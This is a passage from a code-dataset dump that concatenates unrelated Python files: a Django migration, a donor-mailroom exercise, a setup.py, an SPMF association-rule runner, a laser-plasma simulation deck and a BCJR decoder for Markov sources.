preserve_default=True,\n ),\n migrations.CreateModel(\n name='SitePanel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('implementation', models.IntegerField(editable=False)),\n ('site_panel_comments', models.TextField(help_text=b'A short description of the site panel', null=True, verbose_name=b'Site Panel Comments', blank=True)),\n ('project_panel', models.ForeignKey(to='repository.ProjectPanel')),\n ('site', models.ForeignKey(to='repository.Site')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='site_panel',\n field=models.ForeignKey(to='repository.SitePanel'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='compensation',\n name='site_panel',\n field=models.ForeignKey(to='repository.SitePanel'),\n preserve_default=True,\n ),\n migrations.AddField(\n 
model_name='beadsample',\n name='site_panel',\n field=models.ForeignKey(to='repository.SitePanel'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SitePanelParameter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('parameter_type', models.CharField(max_length=3, choices=[(b'FSC', b'Forward Scatter'), (b'SSC', b'Side Scatter'), (b'FCM', b'Fluorochrome Conjugated Marker'), (b'UNS', b'Unstained'), (b'ISO', b'Isotype Control'), (b'EXC', b'Exclusion'), (b'VIA', b'Viability'), (b'ICM', b'Isotope Conjugated Marker'), (b'TIM', b'Time'), (b'BEA', b'Bead'), (b'NUL', b'Null')])),\n ('parameter_value_type', models.CharField(max_length=1, choices=[(b'H', b'Height'), (b'W', b'Width'), (b'A', b'Area'), (b'T', b'Time')])),\n ('fcs_text', models.CharField(max_length=32, verbose_name=b'FCS Text')),\n ('fcs_opt_text', models.CharField(max_length=32, null=True, verbose_name=b'FCS Optional Text', blank=True)),\n ('fcs_number', models.IntegerField()),\n ('fluorochrome', models.ForeignKey(blank=True, to='repository.Fluorochrome', null=True)),\n ('site_panel', models.ForeignKey(to='repository.SitePanel')),\n ],\n options={\n 'ordering': [b'fcs_number'],\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SitePanelParameterMarker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('marker', models.ForeignKey(to='repository.Marker')),\n ('site_panel_parameter', models.ForeignKey(to='repository.SitePanelParameter')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Specimen',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('specimen_name', models.CharField(unique=True, max_length=32)),\n ('specimen_description', models.CharField(unique=True, max_length=256)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='specimen',\n field=models.ForeignKey(to='repository.Specimen'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Stimulation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('stimulation_name', models.CharField(max_length=128)),\n ('stimulation_description', models.TextField(null=True, blank=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='stimulation',\n field=models.ForeignKey(to='repository.Stimulation'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Subject',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subject_code', models.CharField(max_length=128, verbose_name=b'Subject Code')),\n ('batch_control', models.BooleanField(default=False)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='subject',\n field=models.ForeignKey(to='repository.Subject'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SubjectGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('group_name', models.CharField(max_length=128)),\n ('group_description', models.TextField(null=True, 
blank=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='subject',\n name='subject_group',\n field=models.ForeignKey(blank=True, to='repository.SubjectGroup', null=True),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='subjectgroup',\n unique_together=set([(b'project', b'group_name')]),\n ),\n migrations.CreateModel(\n name='SubprocessCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=128)),\n ('description', models.TextField(null=True, blank=True)),\n ],\n options={\n 'ordering': [b'name'],\n 'verbose_name_plural': b'Sub-process Categories',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SubprocessImplementation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('description', models.TextField(null=True, blank=True)),\n ('category', models.ForeignKey(to='repository.SubprocessCategory')),\n ],\n options={\n 'ordering': [b'category', b'name'],\n 'verbose_name_plural': b'Sub-process Implementation',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SubprocessInput',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('description', models.TextField(null=True, blank=True)),\n ('value_type', models.CharField(max_length=64, choices=[(b'Boolean', b'Boolean'), (b'Integer', b'Integer'), (b'PositiveInteger', b'Positive Integer'), (b'Decimal', b'Decimal'), (b'String', b'String'), (b'Date', b'Date')])),\n ('required', models.BooleanField(default=False)),\n ('allow_multiple', models.BooleanField(default=False)),\n ('default', models.CharField(max_length=1024, null=True, blank=True)),\n ('implementation', models.ForeignKey(to='repository.SubprocessImplementation')),\n ],\n options={\n 'ordering': [b'implementation', b'name'],\n 'verbose_name_plural': b'Sub-process Input',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequestinput',\n name='subprocess_input',\n field=models.ForeignKey(to='repository.SubprocessInput'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='VisitType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('visit_type_name', models.CharField(max_length=128)),\n ('visit_type_description', models.TextField(null=True, blank=True)),\n ('project', models.ForeignKey(to='repository.Project')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='sample',\n name='visit',\n field=models.ForeignKey(to='repository.VisitType'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='Worker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('worker_name', models.CharField(unique=True, max_length=128, verbose_name=b'Worker Name')),\n ('worker_hostname', models.CharField(max_length=256, verbose_name=b'Worker Hostname')),\n ('user', models.OneToOneField(editable=False, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='processrequest',\n name='worker',\n 
field=models.ForeignKey(blank=True, to='repository.Worker', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"repository/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":24982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"294034630","text":"#!/usr/bin/env python3\n\n# Global list containing donor names and their donation amounts\ndonor_list = [[\"Harry Potter\", [10000, 5000, 500.55]], [\"Ronald Weasley\", [2499.99, 7500.01]], [\"Hermione Granger\", [100, 2000, 30000]], [\"Draco Malfoy\", [10, 888.88]], [\"Neville Longbottom\", [10]]]\n\n# Email template for Thank You message\nemail = \"\"\"Dear {},\\n\\nThank you for your generous donation of ${}.\\n\\nSincerely,\\nHogwarts School of Witchcraft and Wizardry\"\"\"\n\n\ndef send_thankyou():\n \"\"\"\n * If the user (you) selects ‘Send a Thank You’, prompt for a Full Name.\n * If the user types ‘list’, show them a list of the donor names and re-prompt\n * If the user types a name not in the list, add that name to the data structure and use it.\n * If the user types a name in the list, use it.\n * Once a name has been selected, prompt for a donation amount.\n * Turn the amount into a number – it is OK at this point for the program to crash if someone types a bogus amount.\n * Once an amount has been given, add that amount to the donation history of the selected user.\n * Finally, use string formatting to compose an email thanking the donor for their generous donation. Print the email to the terminal and return to the original prompt.\n\n Args: None\n \"\"\"\n donor_name = input(\"Please enter the full name of a donor. You can also enter list to see all current donors or e to exit: \")\n if donor_name == \"e\":\n return\n\n while donor_name == \"list\":\n for donor in donor_list:\n print (donor[0])\n donor_name = input(\"Please enter the full name of a donor. You can also enter list to see all current donors or e to exit: \")\n\n for donor in donor_list:\n if donor_name == donor[0]:\n donor_found = 0\n break\n elif donor_name == \"e\":\n return\n else:\n donor_found = 1\n\n if donor_found == 0:\n donation_amount = input(\"Please enter the donation amount or e to exit: \")\n if donation_amount == \"e\":\n return\n donor[1].append(float(donation_amount))\n print(email.format(donor_name, donation_amount))\n else:\n donation_amount = input(\"Please enter the donation amount or e to exit: \")\n if donation_amount == \"e\":\n return\n donor_list.append([donor_name, [float(donation_amount)]])\n print(email.format(donor_name, donation_amount))\n\n\ndef create_report():\n \"\"\"\n * If the user (you) selected “Create a Report”, print a list of your donors, sorted by total historical donation amount.\n * Include Donor Name, total donated, number of donations and average donation amount as values in each row. You do not need to print out all their donations, just the summary info.\n * Using string formatting, format the output rows as nicely as possible. 
The end result should be tabular (values in each column should align with those above and below)\n * After printing this report, return to the original prompt.\n\n Args: None\n \"\"\"\n print (\"{:30s} | {:11s} | {:9s} | {:12s}\".format(\"Donor Name\", \"Total Given\", \"Num Gifts\", \"Average Gift\"))\n print (\"-\" * 71)\n\n donor_list.sort(key=lambda i: sum(i[1]), reverse=True)\n \n for donor in donor_list:\n donor_name = donor[0]\n total_given = sum(donor[1])\n num_gifts = len(donor[1])\n average_gift = (total_given / num_gifts)\n print (\"{:30s} ${:11.2f} {:9d} ${:12.2f}\".format(donor_name, total_given, num_gifts, average_gift))\n\n\ndef user_option():\n \"\"\"\n Prompt the user (you) to choose from a menu of 3 actions: “Send a Thank You”, “Create a Report” or “quit”)\n\n Args: None\n \"\"\"\n quit = 1\n while quit:\n option = input(\"Please select an option:\\nc: Create a Report\\ns: Send a Thank You Letter\\nq: Quit\\n: \")\n if option == \"c\":\n create_report()\n elif option == \"s\":\n send_thankyou()\n elif option == \"q\":\n print (\"Bye!\")\n quit = 0\n else:\n print (\"Try again\")\n\nif __name__ == '__main__': \n user_option()","sub_path":"students/prgrover/lesson03/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"436849558","text":"#!/usr/bin/env python\n#\n# http://www.bionicbunny.org/\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nfrom bootstrap import use_setuptools\n\nimport os\nimport setuptools\nimport sys\n\n\nPY_SRC_DIR = os.path.join(\"src\", \"main\", \"python\")\n\n\nsys.path.append(PY_SRC_DIR)\nif sys.version_info <= (2, 4):\n print(\"b3 requires Python version 2.5 or above.\", file=sys.stderr)\n sys.exit(1)\n\n\ndef main():\n setuptools.setup(name=\"b3\",\n version=__import__(\"b3\").__version__,\n url=\"http://github.com/robionica/b3\",\n author=\"Oleksandr Sviridenko\",\n author_email=\"info@bionicbunny.org\",\n description=\"Bionic Bunny Build Tool\",\n long_description=open(\"README.md\").read(),\n install_requires=open(\"requirements.txt\").readlines(),\n license=\"Apache\",\n entry_points={\"console_scripts\": [\"b3 = b3.main:main\"]},\n packages=setuptools.find_packages(PY_SRC_DIR),\n package_dir={\"\": PY_SRC_DIR})\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"533799781","text":"#-*- coding: utf-8 -*-\n'''\nCreated on 2015. 11. 
17\n@author: Zeck\n'''\nfrom __future__ import print_function\nfrom zeck.database import DBHelper\nimport os\nfrom threading import Thread, Lock\nfrom Queue import Queue\nfrom zeck.utils import HashPath, Progress\nfrom zeck.utils.Math import combination\nfrom sys import stdout\nfrom SPMF import SPMF\n###############################################################################################################\n\nclass SPMFDist(object):\n #dependency\n spmf = None\n db = None\n lock = None\n queue = None\n\n\n #options\n last_work= 0\n combimax = 0\n filepath = u''\n outputpath = u''\n filename = u''\n hash_size = 4 #progress\n hash_level = 9 #progress\n minsup = 0.9 #algorithm\n mincof = 0.7 #algorithm\n minlift = 1 #algorithm\n\n def __init__(self, db_name):\n self.db = DBHelper(u'zeus.sigse.org', u'seal_mvn', u'mvnmanager.', db_name)\n self.spmf = SPMF()\n self.lock = Lock()\n self.queue = Queue()\n self.progress = Progress(u'SPMF', 10, 500)\n pass\n\n def get_project_cnt(self):\n '''\n # Gets the project count and names\n The actual work is handed off to the inner function\n :param cur:\n :return:\n '''\n def _result_func(res):\n count = 0\n for row in res:\n count +=1\n return count\n res = self.db.executePROC('GET_PROJECTLIST', None, _result_func)\n self.db.disconnection()\n return res\n\n def analysis(self, filenum):\n hashtext = u'%%0%dd' % (self.hash_level*self.hash_size)\n distpath = HashPath.sequence(hashtext%filenum, self.hash_size, self.hash_level-1)\n\n #input file name\n inputname = os.path.join(self.filepath, distpath)\n inputname = os.path.join(inputname, u'%s_%d.arff'%(self.filename, filenum))\n\n #output file create\n outputname = os.path.join(self.outputpath, distpath)\n self.lock.acquire()\n if not os.path.exists(outputname):\n os.makedirs(outputname)\n self.lock.release()\n outputname = os.path.join(outputname, u'%s_%d.txt'%(self.filename, filenum))\n\n #execute program\n if self.minlift != 1:\n self.spmf.run(u'FPGrowth_association_rules_with_lift', inputname, outputname, (self.minsup, self.mincof, self.minlift))\n else:\n self.spmf.run(u'FPGrowth_association_rules', inputname, outputname, (self.minsup, self.mincof))\n\n\n # Worker in each thread (work until queue is empty)\n def worker(self, tid):\n while True:\n item = self.queue.get() # get an item\n self.analysis(item) # do the work for the item\n\n self.lock.acquire()\n self.progress.check(u'q:%d'% self.queue.qsize()) # progress\n self.lock.release()\n\n self.queue.task_done() # mark the item as done\n\n def print_info(self, _stream):\n _stream.write(u'Work DB : %s\\n'%self.db.dbname)\n _stream.write(u'input path : %s\\n'%self.filepath)\n _stream.write(u'output path : %s\\n'%self.outputpath)\n _stream.write(u'filename : %s\\n'%self.filename)\n _stream.write(u'Loaded projects: %d\\n'%self.project_count)\n _stream.write(u'combination of list = %d\\n'% self.combimax)\n _stream.write(u'min support = %.4f\\n'% self.minsup)\n _stream.write(u'min confidence = %.4f\\n'% self.mincof)\n _stream.write(u'min lift = %.4f\\n' % self.minlift)\n\n def start(self, _poolsize, _column_num):\n #initialize\n self.project_count = self.get_project_cnt()\n self.combimax = combination(self.project_count, _column_num)\n if os.path.exists(self.outputpath) is False:\n os.makedirs(self.outputpath)\n\n #show options\n self.print_info(stdout)\n self.print_info(open(os.path.join(self.outputpath, u'summary.txt'),'w'))\n\n # create worker threads\n for tid in range(_poolsize):\n t = Thread(target=self.worker, args=(tid,))\n t.daemon = True #work as a daemon\n t.start()\n\n #progress start\n 
self.progress.set_point(self.last_work).set_upperbound(self.combimax)\n self.progress.start()\n\n # feed work items into the synchronized queue\n workitem = self.last_work\n while workitem < self.combimax:\n self.queue.put(workitem)\n workitem += 1\n self.queue.join() # block until all tasks are done\n\n self.progress.done()\n pass\n\n\n\n\n###############################################################################################################\n###############################################################################################################\n###############################################################################################################\nif __name__ == '__main__':\n db_name = u'MetaMavenOgirardotMini'\n #filename = os.path.dirname(os.path.abspath(__file__))\n program = SPMFDist(db_name)\n program.filepath = u'E:\\\\_Temp\\\\mvn\\\\dist2'\n program.outputpath = u'E:\\\\_Temp\\\\mvn\\\\SPMFdist_mini'\n program.filename = u'dep'\n program.minsup = 0.01\n program.mincof = 0.01\n program.minlift = 1\n program.last_work = 906221 #restart point: the work item number to resume from\n program.hash_level = 3\n program.hash_size = 3\n #program.startOne()\n program.start(_poolsize=10, _column_num=2)\n","sub_path":"analysis/approach_SPMFdist/SPMFDist.py","file_name":"SPMFDist.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"413262753","text":"import numpy as np\nimport pyh2d as h2d\n\"\"\"\nThis will take an existing h2d '.inf' file and, based on the user's specifications set out below,\nre-write the deck. It will specify:\n\na) A multi-layer planar target. The user can specify the following options (without having to\nchange this Python code)\n 1) region dimensions, materials, and densities\n 2) number of regions\n 3) adjacent cell size ratios in the z-direction\n\nb) A 3d 'bundle' of rays which combined form a laser beam. The ray trace is done\nin 3d and then the energy deposition mapped onto the 2d hydro grid. In order to create a\nuniform ray density (and hence appropriate intensity profile) this is done using a\nCartesian grid of initial rays which are then masked. Currently the mask is circular\nin the plane of the beam, but elliptical beams could be trivially added, as could multiple beams.\nThe user can specify:\n 1) The number of rays in x and y\n 2) The position of the lens and focal spot in 3D.\n 3) The beam's radial supergaussian intensity profile.\n 4) The beam's f/#\n 5) Laser power temporal profile\n\nc) Having calculated the various parameters based on the user's choices, various plots are then made.\n\nd) Finally an existing h2d '.inf' file (which must be in the same directory as Python is running)\nis opened, read in, then re-written with the new data. 
In order for the code to alter the\nappropriate sections, the file must contain the following text:\n'c start zoning'\n'c end zoning'\n'c start rays'\n'c end rays'\n'c start laser power'\n'c end laser power'\n\n\"\"\"\n\nh2d.g.ip_address = '130.246.68.46' #the ip address of the h2d server\nh2d.g.username = 'rscott' #your username\nh2d.g.server_base_directory = '/home/rscott/' #your base directory on the h2d server\nh2d.g.original_h2d_file = 'h2d.inf' #the name of the original h2d input deck\nh2d.g.final_h2d_file = h2d.g.original_h2d_file #the name of the new h2d input deck\nh2d.g.write_file = 1 #is the h2d '.inf' file written\nh2d.g.ray_trace_type = '3d'\nh2d.g.plot_rays = 1 #Are the rays plotted?\nh2d.g.plot_rays_3d = 1 #Are the rays plotted in 3D? (can be slow if many rays)\nh2d.g.clip_beam_x = 0 #if the beams start or finish at x<0 they are removed\nh2d.g.clip_beam_y = 0 #if the beams start or finish at y<0 they are removed\nh2d.g.testing = 0 #extra info/plots for Python script testing\n\n################################################################################################\n#############################Target parameters##################################################\n################################################################################################\n\nh2d.g.regions = 2\n#target per-region params:[region 1 ,region2 ] \n#to add another region, add a column to each parameter below\nh2d.g.region_density = [ 2.70 , 1.78 ]#per-region density\nh2d.g.region_tele = [ 293. , 293. ]#per-region electron temperature(K)(units changed to keV below)\nh2d.g.region_tion = [ 293. , 293. ]#per-region ion temperature(K)\nh2d.g.region_trad = [ 293. , 293. ]#per-region radiation temperature(K)\nh2d.g.region_bfld = [ 0000. , 0000. ]#per-region B field (Gauss)\nh2d.g.region_ratios_z = [ 1.40 , 1.02 ]#per-region ratios of adjacent cell sizes in Z drn\nh2d.g.region_ratios_r = [1.05 ]#ratios of adjacent cell sizes in R drn (applies to all regions)\nh2d.g.target_coords_r = [0. , 1000.0e-4,1000.0e-4]#radial coordinates of target\nh2d.g.target_coords_z = [0. , 0.3e-4, 10.3e-4]#z coordinates of target regions (#regions +1)\nh2d.g.region_cell_n_r = [0 , 50 , 50 ]#num radial cells in tgt regions (first must be 0)\nh2d.g.region_cell_n_z = [0 , 2 , 75 ]#was 6 #num z drn cells in target regions (first must be 0)\n\n##################################################################################################\n##########################Laser parameters########################################################\n##################################################################################################\n\nh2d.g.nrays_x = 250 #number of rays in x before clipping\nh2d.g.nrays_y = 250 #number of rays in y before clipping\nh2d.g.rays_dumped = 500 #~number of rays dumped to file (randomly selected)\nh2d.g.super_g_r0 = 50e-4 #radius of the supergaussian beam intensity profile\nh2d.g.focus_rad = 2.*h2d.g.super_g_r0 #radius at which no more rays are launched\nh2d.g.super_g_exp = 5. 
#supergaussian exponent of beam intensity profile\nh2d.g.f_number = 10 #the f number of the lens\nh2d.g.focus = [0000e-4, 0000e-4, 0e-4]#the position of the focal spot centre [x,y,z]\nh2d.g.lens = [0000e-4, 0000e-4,-4000e-4]#the position of the centre of the lens [x,y,z]\nh2d.g.min_ray_pwr = 1e-5 #Normalised power below which rays are removed\nh2d.g.beam_angle_xy = 00 #beam rotation in xy plane(deg):clockwis from +ve R axis\n\n#laser pulse shape time(s) power(W)\nn_times = 4 #number of laser powers\nlaser_int = np.zeros((n_times,2));\nh2d.g.laser_pwr = np.zeros((n_times,2));\nt=-1;\nt+=1;h2d.g.laser_pwr[t,] = [0.0, 0.0 ]\nt+=1;h2d.g.laser_pwr[t,] = [0.1e-9, 1.65e11 ]\nt+=1;h2d.g.laser_pwr[t,] = [1.9e-9, 1.65e11 ]\nt+=1;h2d.g.laser_pwr[t,] = [2.0e-9, 0.0 ]\n\n\"\"\"\nfrom Riley TAW\nn_times = 11 #number of laser powers\nlaser_int = np.zeros((n_times,2));\nh2d.g.laser_pwr = np.zeros((n_times,2));\nt+=1;h2d.g.laser_pwr[t,] = [0.0, 0.0 ]\nt+=1;h2d.g.laser_pwr[t,] = [0.27e-09, 1.14e+11]\nt+=1;h2d.g.laser_pwr[t,] = [0.54e-09, 1.92e+11]\nt+=1;h2d.g.laser_pwr[t,] = [0.81e-09, 1.76e+11]\nt+=1;h2d.g.laser_pwr[t,] = [1.08e-09, 1.59e+11]\nt+=1;h2d.g.laser_pwr[t,] = [1.35e-09, 1.16e+11]\nt+=1;h2d.g.laser_pwr[t,] = [1.62e-09, 6.72e+10]\nt+=1;h2d.g.laser_pwr[t,] = [1.89e-09, 4.71e+10]\nt+=1;h2d.g.laser_pwr[t,] = [2.16e-09, 2.41e+10]\nt+=1;h2d.g.laser_pwr[t,] = [2.43e-09, 9.79e+09]\nt+=1;h2d.g.laser_pwr[t,] = [2.70e-09, 0.0 ]\n\"\"\"\n\nh2d.g.region_tele = np.asarray(h2d.g.region_tele)/(11605.*1000.) #K => keV\nh2d.g.region_tion = np.asarray(h2d.g.region_tion)/(11605.*1000.)\nh2d.g.region_trad = np.asarray(h2d.g.region_trad)/(11605.*1000.)\n\nif(h2d.g.ray_trace_type == '3d'):\n a = h2d.laser_rays_3d()\nelse:\n print('This deck is for 3d rays - use alternative deck if you want 2d')\n\nif(h2d.g.write_file==1):\n print('About to write new h2d input file, this may take a while if there are lots of rays...')\n a = h2d.write_planar_deck()\n","sub_path":"pyh2d/decks/planar_tgt_3d_rays/deck_planar_target_3d_rays.py","file_name":"deck_planar_target_3d_rays.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584309732","text":"import numpy as np\r\nclass markov_bcjr:\r\n def int_dist(p1):\r\n return np.array([p1,1-p1])\r\n def state_change(p2,p3):\r\n return np.array([[1-p2,p2],[p3,1-p3]])\r\n def likelihood_zero(u):\r\n return (np.exp(u)/(np.exp(u)+1))\r\n def likelihood_one(u):\r\n return (1/(np.exp(u)+1))\r\n def soft_prob(variance,x,a):\r\n \r\n return (1/np.sqrt(2*np.pi*variance))*np.exp(-(x*x+a*a-2*a*x)/(2*variance))\r\n \r\n def hard_dec(x):\r\n if x<0:\r\n return 1\r\n else:\r\n return 0\r\n \r\n def form_path(inp,variance,p2,p3,p1):\r\n t=markov_bcjr.state_change(p2,p3)\r\n k=markov_bcjr.int_dist(p1)\r\n \r\n l=len(inp)\r\n v=variance\r\n \r\n l0=[]\r\n l1=[]\r\n l2=[]\r\n d=[]\r\n d1=[]\r\n h=inp[0]\r\n f=[]\r\n s=[]\r\n \r\n l0.append(np.log(k[0]*markov_bcjr.soft_prob(v,h,-1)))\r\n l1.append(np.log(k[1]*markov_bcjr.soft_prob(v,h,+1))) \r\n d.append(max([l0[0],l1[0]]))\r\n a=np.array([l0[0],l1[0]])\r\n d1.append(2*(a.argmax())-1)\r\n l2.append(l0[0]-l1[0])\r\n f.append(markov_bcjr.hard_dec(-l2[0]))\r\n s.append(markov_bcjr.hard_dec(l2[0]))\r\n for j in range(1,l):\r\n a=[]\r\n h=inp[j]\r\n \r\n e0=markov_bcjr.soft_prob(v,h,-1)\r\n e1=markov_bcjr.soft_prob(v,h,+1)\r\n f0=markov_bcjr.likelihood_zero(l2[j-1])\r\n f1=markov_bcjr.likelihood_one(l2[j-1])\r\n l0.append(np.log(t[0][0]*e0*f0+t[1][0]*e0*f1))\r\n 
l1.append(np.log(t[0][1]*e1*f0+t[1][1]*e1*f1))\r\n l2.append(np.log(t[0][0]*e0*f0+t[1][0]*e0*f1)-np.log(t[0][1]*e1*f0+t[1][1]*e1*f1))\r\n d.append(max([l0[j],l1[j]]))\r\n a=np.array([l0[j],l1[j]])\r\n d1.append(2*(a.argmax())-1)\r\n f.append(markov_bcjr.hard_dec(-l2[j]))\r\n s.append(markov_bcjr.likelihood_one(l2[j]))\r\n continue\r\n return l0,l1,d,d1,l2,f,s\r\n def markov_seq_path(inp,e,p2,p3,p1):\r\n l=np.shape(inp)[0]\r\n l1=np.shape(inp)[1]\r\n o0=[]\r\n o1=[]\r\n o2=[]\r\n o3=[]\r\n o4=[]\r\n o5=[]\r\n o6=[]\r\n \r\n for i in range(0,l):\r\n k0,k1,d,d1,d2,d3,d4=markov_bcjr.form_path(inp[i],e,p2,p3,p1)\r\n \r\n o0.append(k0)\r\n o1.append(k1)\r\n o2.append(d)\r\n o3.append(d1)\r\n o4.append(d2)\r\n o5.append(d3)\r\n o6.append(d4)\r\n return o0,o1,o2,o3,o4,o5,o6\r\n def compute_gamma(inp,p2,p3,variance):\r\n g0=np.zeros((np.shape(inp)[0],2))\r\n g1=np.zeros((np.shape(inp)[0],2))\r\n s=markov_bcjr.state_change(p2,p3)\r\n v=variance\r\n g0[0][0]=np.log(0.5*markov_bcjr.soft_prob(v,inp[0],-1))\r\n g1[0][1]=np.log(0.5*markov_bcjr.soft_prob(v,inp[0],+1))\r\n l=len(inp)\r\n for i in range(1,l):\r\n g0[i][0]=np.log(s[0][0]*markov_bcjr.soft_prob(v,inp[i],-1))\r\n g0[i][1]=np.log(s[0][1]*markov_bcjr.soft_prob(v,inp[i],+1))\r\n g1[i][0]=np.log(s[1][0]*markov_bcjr.soft_prob(v,inp[i],-1))\r\n g1[i][1]=np.log(s[1][1]*markov_bcjr.soft_prob(v,inp[i],+1))\r\n continue\r\n return g0,g1\r\n \r\n \r\n \r\n def forward_recursion(inp,p2,p3,variance):\r\n g0,g1=markov_bcjr.compute_gamma(inp,p2,p3,variance)\r\n a0=np.zeros(np.shape(inp)[0])\r\n a1=np.zeros(np.shape(inp)[0])\r\n l=len(inp)\r\n a0[0]=np.log(1*np.exp(g0[0][0]))\r\n a1[0]=np.log(1*np.exp(g1[0][1]))\r\n \r\n for i in range(1,l):\r\n a0[i]=max(a0[i-1]+g0[i][0],a1[i-1]+g1[i][0])\r\n a1[i]=max(a0[i-1]+g0[i][1],a1[i-1]+g1[i][1])\r\n \r\n continue\r\n return a0,a1\r\n def backward_recursion(inp,p2,p3,variance):\r\n g0,g1=markov_bcjr.compute_gamma(inp,p2,p3,variance)\r\n l=len(inp)\r\n b0=np.zeros(np.shape(inp)[0])\r\n b1=np.zeros(np.shape(inp)[0])\r\n b0[l-1]=np.log(1*(p3/(p2+p3)))\r\n b1[l-1]=np.log(1*(p2/(p2+p3)))\r\n \r\n for i in range(0,l-1):\r\n b0[l-2-i]=max(b0[l-1-i]+g0[l-i-1][0],b1[l-1-i]+g0[l-1-i][1])\r\n b1[l-2-i]=max(b0[l-1-i]+g1[l-i-1][0],b1[l-1-i]+g1[l-1-i][1])\r\n \r\n continue\r\n return b0,b1\r\n def bcjr_out(inp,p2,p3,variance):\r\n \r\n if len(inp)==0:\r\n return inp\r\n else:\r\n g0,g1=markov_bcjr.compute_gamma(inp,p2,p3,variance)\r\n a0,a1=markov_bcjr.forward_recursion(inp,p2,p3,variance)\r\n b0,b1=markov_bcjr.backward_recursion(inp,p2,p3,variance)\r\n l=len(inp)\r\n l1=[]\r\n l2=[]\r\n l3=[]\r\n r0=g0[0][0]+b0[0]\r\n r1=g1[0][1]+b1[0]\r\n r=(r0-r1)\r\n l1.append((r))\r\n l2.append(markov_bcjr.hard_dec(l1[0]))\r\n l3.append(1-markov_bcjr.likelihood_zero(r))\r\n for i in range(1,l):\r\n r0=max(a0[i-1]+g0[i][0]+b0[i],a1[i-1]+g1[i][0]+b0[i])\r\n r1=max(a0[i-1]+g0[i][1]+b1[i],a1[i-1]+g1[i][1]+b1[i])\r\n r=(r0-r1)\r\n l1.append(r)\r\n l2.append(markov_bcjr.hard_dec(l1[i]))\r\n l3.append(1-markov_bcjr.likelihood_zero(r))\r\n continue\r\n return l1,l2,l3\r\n def bcjr_arr_out(in_data,p2,p3,variance):\r\n s1=np.shape(in_data)[0]\r\n o1=[]\r\n o2=[]\r\n o3=[]\r\n for i in range(0,s1):\r\n if len(in_data[i])==0:\r\n o1.append(in_data[i])\r\n o2.append(in_data[i])\r\n o3.append(in_data[i])\r\n else:\r\n l1,l2,l3=markov_bcjr.bcjr_out(in_data[i],p2,p3,variance)\r\n o1.append(l1)\r\n o2.append(l2)\r\n 